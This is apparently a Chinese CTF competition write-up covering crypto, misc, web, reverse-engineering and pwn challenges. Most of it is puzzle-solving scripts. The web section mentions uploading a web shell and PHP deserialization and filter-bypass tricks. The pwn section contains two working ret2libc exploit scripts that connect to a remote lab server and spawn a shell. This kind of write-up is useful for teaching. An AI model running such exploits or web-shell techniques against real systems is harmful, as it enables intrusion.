Crypto
数星星
题目
小明暗恋小红很久了,终于在一个月黑风高的夜晚,决定约她出去数星星。小明数着数着,数出了一串数字,3,6,10,12,15,他觉得这是爱情的关键,思考了整整一晚上,小红很生气,给了他一巴掌。小明觉得就是这串数字让他失去了爱情,你还等什么呢,快来一起数数吧!
得到的结果md5 32位小写加密一下哟!tonightsuccessfavoritefavoritewewesuccesstonightweexamplecryptoshouldweistonightisexamplelearnwesublimlearniswordshouldwelearnfoundsublimsystemexamplesublimfoundlearnshouldmorningsublimsystemyourlearnwordcryptomorningexamplefavoritetonightlearntonightlearntonightsublimwhichyourmorningfoundtonightwewhichfoundfavoritewordcryptomorningwordislearntonightlearnsublimtonightlearnfoundwhichfoundsuccesstonightsuccessyourfoundmorningtonightwordshouldsublimwhichtonightwhichislearnexamplefavoriteexamplefoundsystemsuccesssublimsuccessshouldtonightcryptowelearncryptofoundshouldsublimsublimwewhichtonightsuccessshouldwhichwordwhichcryptoyourisshouldwhichsystemsuccesssystemwhichfoundwhichlearnexampletonightfavoritemorningyourtonightlearnmorningtonightfoundfoundsuccessfavoritesystemwhichlearnexampleisshouldcryptocryptosublimweexampletonightwordshouldwordmorningislearntonightsystemsuccesssuccessismorningfavoriteyourfoundfoundtonightmorningwhichwhichwordfoundislearnwhichwhichshouldwordsystemfoundyourlearnlearnsystemfavoritetonightwordshouldlearnyourisweyourfavoriteshouldwordwefoundsystemwecryptocryptowewordissystemwhichshouldtonightsystemfavoritemorningsystemwewhichmorningfoundsuccessyourtonightsuccesstonightisshouldwewhichwordwesystemyourfavoritesystemwordlearnexamplelearnfoundlearnfavoriteexamplesystemwordcryptocryptolearnsystemwordcryptowhichlearnexamplemorningmorningwewhichwhichsuccessexampleyourwordisfavoritesublimwhichissuccessiswordsublimexamplesystemwordexamplecryptolearnyourexamplelearnsystemyoursuccesswhichwhichsuccesswordyourislearnsuccessiswordsublimshouldweisexamplesuccesssuccesstonightweyourshouldsuccessmorningcryptomorningfoundissublimshouldwhichshouldfavoritesuccessmorningsuccessexamplelearnshouldsublimlearntonightshouldyourissublimlearncryptosuccesswhichfavoritetonightmorningtonightwesuccessweyourisexamplewesystemfavoritemorningsystemmorningcryptolearnsystemwordwordfoundcryptoyourlearnyoursystemwemorningwhichexampleshouldlearncryptofoundwhichislearnwhichwhichisshouldiswordshouldwordsystemshouldshouldsuccessmorningwordfoundsystemwhichsystemtonightcryptowelearnexampleexamplesystemwhichisshouldwordwhichsublimtonightfoundfoundsuccesssuccesssystemsublimcryptoshouldwhichsublimmorninglearnfoundtonightcryptoissuccesscryptoweisfoundshouldfavoriteshouldmorningfavoritesystemcryptosystemlearnsystemfavoritemorningsystemwhichwemorninglearnsuccessfoundwesuccesswewordyourcryptoyourfavoriteissuccessshouldtonightmorningwhichmorningyourwhichfavoritefoundmorningwetonightsystemwordcryptotonightcryptosystemyourwordfoundexampletonightyoursystemcryptosublimmorningyourwordfoundisshouldsuccesscryptotonightsystemfavoriteisyourshouldwhichwordcryptomorningwesublimfavoritesuccessfavoriteyoursuccesstonightlearnweyourwhichfoundyourexampleshouldshouldtonightwelearnwordfavoritewordwefoundmorningexampleshouldexamplewordsuccessfavoritewhichfoundwordcryptofavoriteyourlearnyourwewhichfoundmorningsystemweexamplefavoritewordisexamplesublimwordyourmorningtonightwordsuccesscryptosuccessyoursuccesstonighttonightwelearnwhichwhichwordmorningwhichsystemcryptoismorningsystemexamplecryptoyourexamplelearnsublimsuccessyoursystemfoundmorningshouldcryptotonightsublimwordexamplemorningsystemyourexampleweexamplefavoritesuccesssublimfavoritecryptoshouldisshouldwordtonightfoundsublimisistonightshouldissuccesstonightissuccessmorningsystemcryptoiswhichtonighttonightfavoritelearnshouldyourfoundexamplesystemwordsuccessweyourtonightcryptoyourfavoritewhichfavoriteisyoursystemfoundyourfavoriteshouldlearnyourfoundexampleyourmorningshouldsuccessmorningmorningexampleexamplefoundsublimfoundwhichisfavoritelearnfoundmorningcryptofavoritecryptoshouldweshouldtonightcryptoissublimcryptosublimwhichwhichsublimwhichcryptofavoritewordwordsublimexamplewhichwhichshouldlearncryptowhichshouldmorninglearnfavoriteyourexamplesublimtonightshouldfoundtonightsuccessshouldmorningfoundwordweyourlearnsublimsystemiscryptowordyourtonightcryptosublimmorningmorningexamplefavoritewordwhichlearnshouldmorningsublimfoundtonightsublimsublimexamplefoundyourexamplewordfoundwemorningfavoritefoundcryptosuccesssublimsublimexamplewordsuccessexamplefavoritesuccessissublimlearnyourexamplesuccesssuccesssystemsuccessmorningmorninglearnexamplemorningtonightfoundiswhichfavoritemorningwhichsuccessmorningyourmorningislearncryptowhichyourwhichyourwordtonighttonightsuccesslearnwhichfoundsuccesssystemfoundiswhichlearnsystemsublimcryptowhichmorningwetonightshouldlearnwhichfoundcryptofavoritelearnlearnshouldfoundsuccessexampletonightwordsuccessfoundyourtonightwhichfoundsuccessshouldmorningyourfavoritemorningsystemsystemsuccessshouldwelearnwhichfoundexamplewewordfoundweshouldsystemsystemmorningmorningisshouldwhichsublimwhichtonightsuccesssystemsystemcryptoyourshouldsublimfoundwetonightfavoriteexamplewewesuccessfoundyourtonightfoundsystemexamplecryptofoundshouldshouldsuccesswhichisexampletonightwordlearnfavoriteyourlearnsystemsublimfoundlearnsuccesssystemshouldsublimfavoritelearnsystemfavoritetonightexamplefoundyourfavoritewhichlearnfavoritecryptoyoursystemmorningwordwesystemfoundfoundshouldsystemwhichwhichissystemsublimcryptoyourmorninglearnlearntonightsublimlearnwhichwhichissystemyouryourcryptowhichshouldwordyoursublimfavoriteexamplemorningexamplesublimsublimissystemexampleshouldsublimlearnfoundwhichislearnmorningmorningfoundwordtonightmorningfavoritewhichlearnyoursystemtonightisexamplelearntonightisweshouldcryptosuccessisexamplesuccesswordshouldmorningyourislearnwordwordshouldcryptocryptotonightiscryptocryptoisisfavoriteyourtonightwhichmorningfoundwewhichexamplewhichfoundyoursublimsystemwordexampleexamplesystemsuccessyoursublimwhichmorningissystemfoundlearnsystemshouldsublimsublimwhichshouldwordyourshouldexampleexampleshouldsuccesswelearnfoundsublimshouldyourwewhichtonightwefavoritesublimsystemlearnshouldfoundsuccessyourwhichsuccessmorningcryptowhichyourfoundexampletonightlearnexampleexamplefoundlearnsuccesssystemiscryptofavoritewordfoundislearncryptowordlearnlearnexamplesuccessfavoritefavoritesystemmorningcryptotonightfavoritefavoritewhichsuccesscryptowhichissublimexamplewhichfoundtonightcryptotonightsublimfavoritesuccesssublimwordwhichtonightwordshouldwordfoundsystemtonightyourissuccessshouldweisfavoriteisisfavoritewecryptoisisyourtonightlearnsuccessmorningyourtonightsuccessshouldiscryptowhichwhichshouldsublimsystemexamplemorningcryptofavoritewordsuccesswordisfavoritelearnsublimlearnsuccesscryptowordsuccesswhichfavoritecryptosystemsublimsuccessweisyourwhichlearnyourwewemorningsuccesslearncryptoiswecryptosystemlearnwhichwhichyourexamplefoundsystemcryptoyourfavoritefoundyoursublimiswesublimfavoritemorningshouldexamplefavoritecryptoshouldtonightmorningwordfoundsystemwhichwhichsystemwordcryptoissublimlearnsuccessmorningsublimsystemcryptoyoursublimwesuccessmorningsublimiscryptoissublimwordlearnsuccesssublimlearncryptoweweexamplecryptowefavoritelearnfoundissystemsystemexampleshouldlearnsuccesssublimcryptoistonightismorningmorningfavoriteshouldfavoritefoundwordwordshouldwordshouldfoundfoundcryptosuccessissuccessshouldwewhichfavoriteweweshouldmorningfoundyoursuccessiswefavoriteyoursuccesswhichwhichexamplelearnfoundwetonightyourcryptowordsublimsublimtonightsuccesslearnistonightwhichtonightwordsublimfavoritewefoundcryptoiswhichwhichlearnlearntonightexamplesystemwhichsublimfavoritecryptoshouldyouryourisyourwesublimmorningwesystemshouldtonightwordyourshouldfavoritefoundyourfavoritewhichsublimwewordwefoundfoundlearnfoundwecryptosystemexamplemorningcryptocryptosublimwordexamplefavoritefoundlearnwelearnmorningwordwhichwordsystemsublimtonightsuccesssystemlearnshouldwhichiswhichsuccesssuccessisexamplefavoritewhichshouldsublimlearniswordshouldexamplelearnsystemyoursublimisissuccesswelearntonightexamplewecryptowhichwesystemsystemsublimexamplecryptolearnmorningsublimfoundsublimfoundisfoundtonighttonightfavoritesuccesssuccessexampleyoursuccesstonightsublimcryptosystemwewhichexamplesystemwordwordfavoritesublimtonightisfavoritesystemexamplewordsuccesstonightmorningsuccesstonightwefavoritesublimtonightwelearntonightmorningsublimiswhichwordtonightwhichwecryptofoundwordwhichfavoriteissuccesswesystemyourexampleiswhichsuccesstonightsublimwemorningsuccesssuccesswesublimsuccessfavoritesublimfoundlearnlearnweexamplecryptofavoritelearnweyourshouldyourfoundcryptolearnfoundmorningtonightmorningmorningfavoritewecryptowewesuccessfoundsublimweyourwhichshouldshouldshouldsublimistonightwhichwesublimsuccessshouldfoundwordwordtonightwecryptowewhichfoundcryptoshouldcryptoyouryourfoundwhichsublimsublimwordlearnwordshouldfavoriteisfoundsuccessshouldtonightwhichmorningsystemmorningtonightwefavoritelearnisexampleyourshouldfavoritesublimsublimexamplewordsuccessfavoritesystemmorningfavoritecryptosystemsublimcryptosystemsuccessshouldmorningisshouldmorninglearnfavoritefavoriteshouldwordwewesublimsublimfavoriteyoursuccesswhichsystemfoundshouldshouldcryptoisyourmorningsystemshouldshouldtonightwesublimyourfoundlearniswordtonightmorningexampleyourwordfoundisshouldtonightcryptocryptofoundyourexamplefavoritecryptoyourfavoritewordfavoriteshouldweshouldfoundwemorningcryptosuccesslearnfoundtonightsublimfavoritefavoritewefoundwewesuccesssublimsublimcryptoweexampletonightsuccessfoundshouldsuccesstonightissystemshouldwesystemfavoriteisyoursystemiswefavoritelearnfavoritefavoritesuccesslearntonightyourlearnsuccessissuccesswesystemyourcryptofavoritewordsystemyourfavoritewewordsuccessweshouldfoundshouldcryptomorningtonightwewordwesuccesslearnwordshouldweexampletonightsuccessfavoritefavoritemorningfoundmorningfoundyoursublimsystemsuccessissuccessmorningyourwordfoundweexamplemorningsublimlearnfoundfoundfavoritemorningshouldweyourwemorningexamplesuccesssuccessfoundwordwordshouldweyourshouldwordshouldexamplefavoritefoundsuccesssystemfoundshouldsublimistonightshouldsystemtonightsuccesslearntonightsystemsublimsuccesscryptoissystemsublimmorningmorningshouldmorninglearnsuccesslearnmorningyourmorninglearnexamplecryptoshouldissublimshouldfoundissystemsystemweexamplesystemtonightsublimmorningmorningyourfoundcryptolearnisshouldisfavoritesublimfoundwordcryptoyourshouldsuccesssystemsuccessshouldsystemissublimshouldsublimsystemisexampleshouldissublimfavoritelearnsublimyourisyoursublimsuccesssublimyouryourfavoriteshouldsuccessfavoritefavoritelearnexamplesystemweexamplesublimisiscryptoshouldyourcryptosublimissublimshouldsystemfavoritefavoritewordsuccesssuccesslearnsystemsublimwefavoritelearnyoursublimsystemyourfavoriteyourwordsuccesslearnwelearnwefavoritecryptolearncryptofavoritefavoriteiscryptowordcryptoyourcryptoissuccesslearnwordsystemsuccesswordsystemsystemcryptosuccessissublimlearnsublimcryptoislearnsublimyoursublimexamplecryptosublimsystemfavoritecryptocryptoyourwordyourfavoriteisfavoritefavoritewordcryptocryptosystemissublimiscryptocryptoissystemyourwordfavoritesystemsystemsystemyourfavoritewordcryptoyouryoursystemwordyourcryptoexamplefavoritecryptoexamplefavoritewordexampleexamplewordcryptowordyourfavoritewordexampleexamplecryptowordexampleexamplewordfavoritewordcryptocryptoexamplewordexamplecryptocryptowordfavoriteexamplecryptofavoritewordexampleexampleexamplecryptocryptoexampleexamplewordfavoritewordcryptowordwordwordwordwordwordexampleexamplewordwordexamplewordexamplewordexampleexampleexampleexampleexampleexampleexampleexampleexampleexampleexampleexampleexampleexampleexampleexampleexampleexampleexample我的解答:
思路:分析每个单词出现的频率进行排序,然后对应数星星的数字3,6,10,12,15.找出对应的单词组合起来就是答案。做法如下:
看到了一大串英文单词组成的集合,我们词频分析一下,获取每个单词出现的频率。
这里手动在txt文本里操作即可,我的操作是使用txt替换功能,每找出一个单词可以替换成“.”这样一来不容易找漏,一直到最后可以很清晰看到哪些单词还没找到。
找到后对应写脚本即可:
# -*- coding:utf-8 -*-
# Author: 小琪呀!
f=open("1.txt",'r')
data=f.read()
statistics={}
frequency=[]
num=[3,6,10,12,15]
def zipin(lsit):
for i in lsit:
statistics.setdefault(data.count(i),str(i))
frequency.append(data.count(i))
frequency.sort()
for i in num:
print(''.join(statistics.get(frequency[i-1])),end='')
print('\n')
return(statistics)
#下面letters里是附件里的所有出现的单词。
if __name__ == '__main__':
letters=["tonight","success","favorite","example","should","crypto","is","learn","found","morning","we","system","sublim","your","which","word"]
print(zipin(letters))
#看到密文全是一些单词的重复,所以想到词频统计,
# 首先获取每个单词出现的频率,然后按序排列,
# 最后将排在3,6,10,12,15的单词进行拼接即可。
#whichisyourfavoriteword
#{117: 'tonight', 138: 'success', 136: 'favorite', 139: 'example', 131: 'should', 141: 'crypto', 129: 'is', 134: 'learn', 125: 'found', 113: 'morning', 124: 'we', 130: 'system', 132: 'sublim', 133: 'your', 120: 'which', 140: 'word'}最后记得MD5
神秘组织M
题目
这个组织是由5个人创建起来的!!!
{bc1bg572ec066}a0d2fb137l951b5451f06b7我的解答:
这个题很有意思算是花费时间最久的了。。。
思路:看到数字5?凯撒/栅栏?做法如下:
首先我们使用凯撒/栅栏解码会发现都直接得不出来flag?那么问题来了,第一步肯定要做些什么。
尝试使用rot13试试
再使用凯撒/栅栏?发现使用栅栏可得到flag形式的结果了(这里偏移量是5,4个一组,4是试出来的!):
然后再用一遍rot13(不知道为什么的话,可以使用随波逐流直接解,我就是用随波逐流才发现的是rot13!)
不一样的四四方方(有思路但未出结果)
我爱456(无思路)
AFF
题目
得到的结果大写再提交flag
flag = "WMPTPTRGGPED"
flaglist = []
for i in flag:
flaglist.append(ord(i)-97)
flags = ""
for i in flaglist:
for j in range(0,26):
c = (3 * j - 17) % 26
if(c == i):
flags += chr(j+97)
print(a,b,flag)我的解答:
思路:看到题目名知道是仿射,主要是找对应方程的a,b
观察代码得知对应的a,b分别是3,17
然后结果大写
base
题目
j2rXjx8wSZjD
GHI3KLMNJOPQRSTUb=cdefghijklmnopWXYZ/12+406789VaqrstuvwxyzABCDEF5
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789=+/我的解答:
典型的base64换表,这里并不缺字符,因此cyber直接梭就行。哎!这道题500分可惜了!不该这么高的。
Misc
签到喵
题目
小明养了一只可爱的猫咪并给它起名叫小美,有一天小美突然站立了起来,并说出以下这段喵语:
~呜喵喵喵喵呜啊喵啊~呜喵呜呜~呜啊~啊喵啊呜喵呜~~~喵~呜呜呜~~喵喵喵呜呜呜~呜呜喵呜呜啊喵呜啊啊喵啊呜~喵啊啊~喵~呜呜呜呜啊喵喵喵呜啊喵啊喵呜喵呜呜~喵喵喵啊喵啊呜喵呜喵~~喵~呜呜喵啊喵喵喵喵呜啊喵喵呜呜喵呜呜啊喵呜呜啊喵啊呜喵呜~喵~喵~呜呜呜喵喵喵喵喵呜呜喵喵呜呜喵呜呜~喵啊啊啊喵啊呜喵喵啊啊~喵~呜呜喵~喵喵喵喵呜呜喵喵啊呜喵呜呜~呜啊呜啊喵啊呜~喵啊啊~喵~呜呜喵啊~喵喵喵呜呜啊呜啊呜喵呜呜啊呜啊啊啊喵啊呜~啊呜喵~喵~呜喵呜~~喵喵喵呜呜啊~啊呜喵呜呜~呜啊呜啊喵啊呜~啊喵喵~喵~呜喵啊喵喵喵喵喵呜呜~喵~呜喵呜呜~喵啊~啊喵啊呜~喵啊喵~喵~呜呜呜喵呜喵喵喵呜啊喵啊喵呜喵呜呜啊呜~呜啊喵啊呜喵呜呜呜~喵~呜喵呜啊喵喵喵喵呜呜呜呜啊呜喵呜呜~喵喵喵啊喵啊呜~啊喵啊啊
小明感到十分诧异,他觉得这是小美在告诉他什么隐藏的信息,请你帮助小明翻译小美说了什么,并根据生成文件得到答案import qrcode
import base64
message = '6K+35Y+R6YCB4oCc5a6d5a6d5oOz6KaBZmxhZ+KAnQ=='
print(base64.b64decode(message).decode())
qr = qrcode.QRCode(
version=1,
error_correction=qrcode.constants.ERROR_CORRECT_H,
box_size=10,
border=4,
)
qr.add_data('')#放入小美说的话
qr.make(fit=True)
img = qr.make_image(fill='black',back_color='white')
img.save('qrcode.png')我的解答:
题目代码太明显了“放入小美说的话”会生成一个二维码,直接跑即可
import qrcode
import base64
message = '6K+35Y+R6YCB4oCc5a6d5a6d5oOz6KaBZmxhZ+KAnQ=='
print(base64.b64decode(message).decode())
qr = qrcode.QRCode(
version=1,
error_correction=qrcode.constants.ERROR_CORRECT_H,
box_size=10,
border=4,
)
qr.add_data('~呜喵喵喵喵呜啊喵啊~呜喵呜呜~呜啊~啊喵啊呜喵呜~~~喵~呜呜呜~~喵喵喵呜呜呜~呜呜喵呜呜啊喵呜啊啊喵啊呜~喵啊啊~喵~呜呜呜呜啊喵喵喵呜啊喵啊喵呜喵呜呜~喵喵喵啊喵啊呜喵呜喵~~喵~呜呜喵啊喵喵喵喵呜啊喵喵呜呜喵呜呜啊喵呜呜啊喵啊呜喵呜~喵~喵~呜呜呜喵喵喵喵喵呜呜喵喵呜呜喵呜呜~喵啊啊啊喵啊呜喵喵啊啊~喵~呜呜喵~喵喵喵喵呜呜喵喵啊呜喵呜呜~呜啊呜啊喵啊呜~喵啊啊~喵~呜呜喵啊~喵喵喵呜呜啊呜啊呜喵呜呜啊呜啊啊啊喵啊呜~啊呜喵~喵~呜喵呜~~喵喵喵呜呜啊~啊呜喵呜呜~呜啊呜啊喵啊呜~啊喵喵~喵~呜喵啊喵喵喵喵喵呜呜~喵~呜喵呜呜~喵啊~啊喵啊呜~喵啊喵~喵~呜呜呜喵呜喵喵喵呜啊喵啊喵呜喵呜呜啊呜~呜啊喵啊呜喵呜呜呜~喵~呜喵呜啊喵喵喵喵呜呜呜呜啊呜喵呜呜~喵喵喵啊喵啊呜~啊喵啊啊')#放入小美说的话
qr.make(fit=True)
img = qr.make_image(fill='black',back_color='white')
img.save('qrcode.png')得到二维码
哎!不对不对,抱歉,艹这是加密脚本,看错了,这个码扫完就是原本的喵啊喵。。。
但我们跑脚本还得到了一个信息:请发送“宝宝想要flag”
关注公众号发送此话,拿flag即可
宝宝请拿flag:flag{www.PolarCTF.com}
A 宽宽 S 00 E(未出)
题目
(一)判断是否存在注入 and 1=1、and 1=2等等 (二)判断字段数 order by 2 (三)判断显错位 union select 1,2 (四)判断库名 and 1=2 union select 1,database() (五)判断表名 and 1=2 union select 1,table_name from information_schema.tables where table_schema =’maoshe’ (六)判断列名 and 1=2 union select 1,column_name from information_schema.columns where table_name =’admin’ limit 2,1 (七)寻找具体数据 and 1=2 union select 1,password from admin
什么啊?不会,再见。。。下一题。
机密
题目
我的解答:
题目给了流量包,分析一下
追踪TCP流发现
看到有个压缩包,kali提取出来进行爆破,选择爆破数字,得到密码
flag{d72e5a671aa50fa5f400e5d10eedeaa5}
是uu吗
题目
密码.txt
&,3(S-#4V还有一个wav文件。
我的解答:
根据题目名字UU,UUencode解码得到wav密码。
然后steghide解码
steghide extract -sf noon-close-to-you.wav得到
>9FQA9WLV-S$S-S@Y-#8P,C,V-#@W-S@S,C0V.#E]再次UU解码
flag{671378946023648778324689}社会主义大法好
题目
一张jpg,一个加密压缩包
我的解答:
重命名jpg打开
看到里面关键数字1945,2014
尝试发现1945是压缩包密码,解压得到
平等平等和谐文明自由公正法治和谐公正自由自由法治平等公正公正诚信民主平等爱国和谐民主和谐爱国公正爱国平等爱国平等自由自由平等公正自由公正诚信和谐公正民主自由爱国公正友善公正自由诚信民主和谐敬业平等法治公正民主和谐富强自由诚信富强法治平等自由诚信富强法治平等和谐自由平等平等自由民主法治富强公正友善平等自由诚信和谐法治诚信富强自由诚信和谐公正平等和谐公正和谐敬业法治爱国平等爱国公正法治和谐爱国法治敬业自由文明自由友善平等和谐富强自由公正法治法治和谐平等法治民主和谐自由自由爱国法治自由平等民主和谐平等文明友善平等法治民主自由诚信民主和谐公正自由文明自由和谐自由文明富强友善自由文明友善平等平等法治公正诚信民主自由爱国平等民主自由自由公正敬业自由敬业法治爱国公正友善平等法治和谐和谐友善法治社会主义解码
U2FsdGVkX18hXTEdmaHlK9Wa0JuJu4UApkMzMe69xXg8yBK0Fw5q4HtQ5+qK6BCB
+WkHQDiIxks=兔子流解码,密码是2014
flag{Hold_high_the_banner_of_socialism}
EZ签到(未出)
WEB
cookie欺骗
题目
我的解答:
Bp抓包改cook :user=admin
upload
题目
我的解答:
构造payload
然后上传
蚁剑连接找到flag
cool
题目
<?php
if(isset($_GET['a'])){
$a = $_GET['a'];
if(is_numeric($a)){
echo "no";
}
if(!preg_match("/flag|system|php/i", $a)){
eval($a);
}
}else{
highlight_file(__FILE__);
}
?>我的解答:
首先,它检查 $a 是否为数值。如果是,则输出 "no"。那我们不让他为数字
然后绕过匹配条件,使他包含所提到的字符。最终可以得到payload:
随机值
题目
<?php
include "flag.php";
class Index{
private $Polar1;
private $Polar2;
protected $Night;
protected $Light;
function getflag($flag){
$Polar2 = rand(0,100);
if($this->Polar1 === $this->Polar2){
$Light = rand(0,100);
if($this->Night === $this->Light){
echo $flag;
}
}
else{
echo "Your wrong!!!";
}
}
}
if(isset($_GET['sys'])){
$a = unserialize($_GET['sys']);
$a->getflag($flag);
}
else{
highlight_file("index.php");
}
?> 我的解答:
一个简单的反序列化
exp:
phpurl
题目
在某次渗透测试中,红队使用网站目录探测工具发现网站源码泄漏,该文件名疑似名被加密:aW5kZXgucGhwcw。 
我的解答:
根据提示解码加密文件
访问该地址,得到
<?php
if("xxs"===$_GET[sys]) {
echo("<p>Not a good idea!</p>");
exit();
}
$_GET[sys] = urldecode($_GET[sys]);
if($_GET[sys] == "xxs")
{
echo "<p>Welcome to polar LABS!</p>";
echo "<p>Flag: XXXXXXX </p>";
}
?>
what can you find? 上传参数名为sys,且值为xxs但需要url加密一下,而且是走两次第一个if条件
你想逃也逃不掉
题目
<?php
/*
https://ytyyds.github.io/ (与本题无关)
*/
error_reporting(0);
highlight_file(__FILE__);
function filter($string){
return preg_replace( '/phtml|php3|php4|php5|aspx|gif/','', $string);
}
$user['username'] = $_POST['name'];
$user['passwd'] = $_GET['passwd'];
$user['sign'] = '123456';
$ans = filter(serialize($user));
if(unserialize($ans)[sign] == "ytyyds"){
echo file_get_contents('flag.php');
} 我的解答:
序列化处理后:
目标子串:";s:6:"passwd";s:2:"sb";s:4:"sign";s:6:"ytyyds";}
需要吃掉";s:6:"passwd";s:26:"共21个字符
即逃逸21个字符
20 = 4*4 + 5
在上面匹配里找4个字符长度为4的字符串和一个为5的,即:
`php4php4php4phtmlphp4
RE
easyre1
我的解答:
exp:
a='d^XSAozQPU^WOBU[VQOATZSE@AZZVOF'
flag = ''
b = '5055045045055045055045055045055'
for i in range(len(a)):
flag+=chr((ord(a[i])+1)^ord(b[i]))
print(flag)
#PolarDNbecomesbiggerandstrongerbabyRE
我的解答:
也就是说加2等于flag
exp:
a='asdfgcvbnmjgtlop'
flag = ''
for i in range(len(a)):
flag+=chr(ord(a[i])+2)
print(flag)
#cufhiexdpolivnqrPY_RE
题目
start.py
import Test
Dict = {}
key = 'A'
value = 26
for i in range(1,27):
Dict.setdefault(key, value)
key = chr(ord(key) + 1)
value = value - 1
print("===================Py_Reverse====================")
def main():
Input_Str = input("Please Input Str:\n")
Input_Str = list(Input_Str)
Test.EnData1(Input_Str,Dict)
Test.Judge(Input_Str)
main()Test.py
def EnData1(Input_Str,Dict):
for i in range(int(len(Input_Str)/2),len(Input_Str)):
for dict in Dict:
if Input_Str[i] == str(dict):
Input_Str[i] = Dict[dict]
break
def Judge(Input_Str):
FLAG = ['H', 'E', 'L', 'L', 'O', '_', '_', 11, 2, 7, 19, 12, 13]
if str(Input_Str) == str(FLAG):
print("YES!")
else:
print("NO!")
all_data = []
def EnData(Input_Str,Dict):
for i in range(int(len(Input_Str)/2),len(Input_Str)):
flag = 0
for dict in Dict:
if Input_Str[i] == dict:
all_data.append(Dict[dict])
flag = 1
if flag == 0:
all_data.append(Input_Str[i])我的解答:
打印字典
MD5加密
flag{ceee59bbd765a9cb20daa0c1d2b3b9d0}
PWN
look
我的解答:
exp:
from pwn import *
p=remote('120.46.59.242','2095')
w_plt=0x80483E0
w_got=0x804A018
main=0x8048410
payload=b'a'*108+p32(0)+p32(w_plt)+p32(main)+p32(1)+p32(w_got)+p32(4)
p.sendline(payload)
write_addr=u32(p.recv(4))
print(hex(write_addr))
libc_add=write_addr-0x0d44d0
bin_sh=libc_add+0x15912b
system=libc_add+0x03a950
payload=b'a'*112+p32(system)+p32(main)+p32(bin_sh)
p.sendline(payload)
p.interactive()
05ret2libc_64
我的解答:
64位的ret2libc
先泄露libc地址,再通过栈核栈溢出,来执行system(“/bin/sh”),getshell
exp:
from pwn import *
p=remote('120.46.59.242','2099')
puts_plt=0x4005A0
gets_got=0x601038
pop_rdi=0x400843
main=0x400610
payload=b'a'*256+p64(0)+p64(pop_rdi)+p64(gets_got)+p64(puts_plt)+p64(main)
p.recvuntil('question:\n')
p.sendline(payload)
p.recvuntil('Maybe the answer is 0\n')
gets_got=u64(p.recv(6).ljust(8,b'\x00'))
libc_base=gets_got-0x06ed90
bin_sh=libc_base+0x18ce57
system=libc_base+0x0453a0
payload=b'a'*256+p64(0)+p64(pop_rdi)+p64(bin_sh)+p64(system)
p.sendline(payload)
p.interactive()